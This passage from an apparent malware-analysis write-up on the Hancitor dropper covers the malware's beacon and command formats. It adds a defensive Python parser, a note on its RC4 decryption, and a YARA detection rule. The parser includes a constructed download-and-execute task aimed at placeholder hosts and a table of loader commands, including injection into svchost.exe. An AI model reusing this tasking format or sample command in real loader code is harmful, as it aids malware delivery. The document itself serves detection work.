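The two text formats from this section, the SystemInfo beacon string and the “<letter>:<payload>” task lines the main command processor accepts, parsed in Python as an added analyst example (not Hancitor's code and not from the original post); the command meanings follow the table above, and the sample beacon and URLs are constructed:

```python
"""Added analyst example, not Hancitor's code and not from the original post.

Parses the two formats described above: the SystemInfo beacon string
"GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32|x64)" and the task
lines the main command processor accepts, "<letter>:<payload>" with the
URLs in the payload separated by "|". Sample values are constructed.
"""
import re
from typing import Optional

BEACON_RE = re.compile(
    r"^GUID=(?P<guid>\d+)&BUILD=(?P<build>[^&]+)&INFO=(?P<info>[^&]*)&IP=(?P<ip>[^&]*)"
    r"&TYPE=1&WIN=(?P<major>\d+)\.(?P<minor>\d+)\((?P<arch>x32|x64)\)$"
)

# Command letters the 2018 processor handles, per the table above; "c" and "d"
# hit the default branch and are rejected, exactly like an unknown letter.
COMMANDS = {
    "r": "download and execute .DLL (rundll32) or .EXE",
    "l": "download and execute .EXE in a separate thread (arg=1)",
    "e": "download and execute .EXE in a separate thread (arg=0)",
    "b": "download and inject code into svchost.exe",
    "n": "not implemented (result set to 1 without action)",
}


def parse_beacon(body: str) -> Optional[dict]:
    """Return the beacon fields, or None if the body is not in Hancitor's format."""
    m = BEACON_RE.match(body)
    if not m:
        return None
    fields = m.groupdict()
    fields["guid"] = int(fields["guid"])
    fields["windows"] = fields.pop("major") + "." + fields.pop("minor")
    return fields


def parse_task(task: str) -> Optional[dict]:
    """Split a task line the way the processor does: letter, ':' at offset 1, payload."""
    if len(task) < 2 or task[1] != ":":      # mirrors the *(cmd + 1) == ':' check
        return None
    letter, payload = task[0], task[2:]
    if letter not in COMMANDS:               # default branch -> result 0
        return None
    urls = [u for u in payload.split("|") if u]
    return {"cmd": letter, "action": COMMANDS[letter], "urls": urls}


if __name__ == "__main__":
    # Constructed sample beacon and task (the build string is the one reviewed here)
    print(parse_beacon("GUID=1234567890123&BUILD=25xce10&INFO=WORKSTATION-01"
                       "&IP=198.51.100.7&TYPE=1&WIN=6.1(x64)"))
    print(parse_task("r:http://203.0.113.5/a.exe|http://203.0.113.6/a.exe"))
```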

C. Hancitor RC4 CryptDecrypt Routine

The Hancitor dropper heavily utilizes RtlDecompressBuffer and the Crypto API to decrypt its payloads. Rather than relying on a custom decryption routine, the malware simply implements RC4 decryption through the Crypto API (CryptDecrypt).

IV. Yara Signature

import "pe"

rule crime_win32_hancitor_dropper {
meta:
author = "@VK_Intel"
reference = "Detects Hancitor Dropper/Loader"
date = "2018-11-04"
hash1 = "c61f929981c573e43dd08f0c5a047ba3a3167436b493df819461d4e7953a91ed"
strings:
$s1 = "Rundll32.exe %s,f1" fullword ascii
$s2 = "explorer.exe" fullword ascii
$s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
$s4 = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" fullword ascii
$s5 = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)" fullword ascii
$s6 = "http://api.ipify.org" fullword ascii
$s7 = "Content-Type: application/x-www-form-urlencoded" fullword ascii

$crypt_sysfunction = { 8d ?? ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 0f b6 c3 83 c4 08 c1 eb 08 89 ?? ?? 0f b6 db e8 ?? ?? ?? ?? 83 f8 01 a1 ?? ?? ?? ?? 75 ?? 85 c0 75 ?? 68 00 20 00 00 e8 ?? ?? ?? ?? 68 00 20 00 00 68 18 40 1e 00 50 a3 ?? ?? ?? ?? e8 ?? ?? ?? ?? 6a 08 68 10 40 1e 00 68 00 20 00 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? a1 ?? ?? ?? ?? 83 c4 20}

$external_ip_resolution = { 55 8b ec 51 80 ?? ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? 50 6a 20 68 80 61 1e 00 68 c4 31 1e 00 e8 ?? ?? ?? ?? 83 c4 10 83 f8 01 75 ?? 8b ?? ?? c6 ?? ?? ?? ?? ?? ?? 68 80 61 1e 00 ff ?? ?? ff ?? ?? ?? ?? ?? b8 01 00 00 00 8b e5 5d c3 68 dc 31 1e 00 ff ?? ?? c6 ?? ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 33 c0 8b e5 5d c3}

$main_cmd_processor = { 55 8b ec 8b ?? ?? 80 ?? ?? ?? 75 ?? 0f ?? ?? 83 c0 9e 83 f8 10 77 ?? 0f ?? ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 04 89 ?? b8 01 00 00 00 5d c3 6a 01 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 08 89 ?? b8 01 00 00 00 5d c3 6a 00 eb ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 04 89 ?? b8 01 00 00 00 5d c3 8b ?? ?? c7 ?? ?? ?? ?? ?? b8 01 00 00 00 5d c3 33 c0 5d c3}

condition:
( uint16(0) == 0x5a4d and
filesize < 60KB and
pe.imphash() == "9ea0470ccffd0a7ac8dd70e0968d3e95" and
( all of them )
or 5 of ($s*) and ( $main_cmd_processor ) or ( $crypt_sysfunction and $external_ip_resolution ) )
}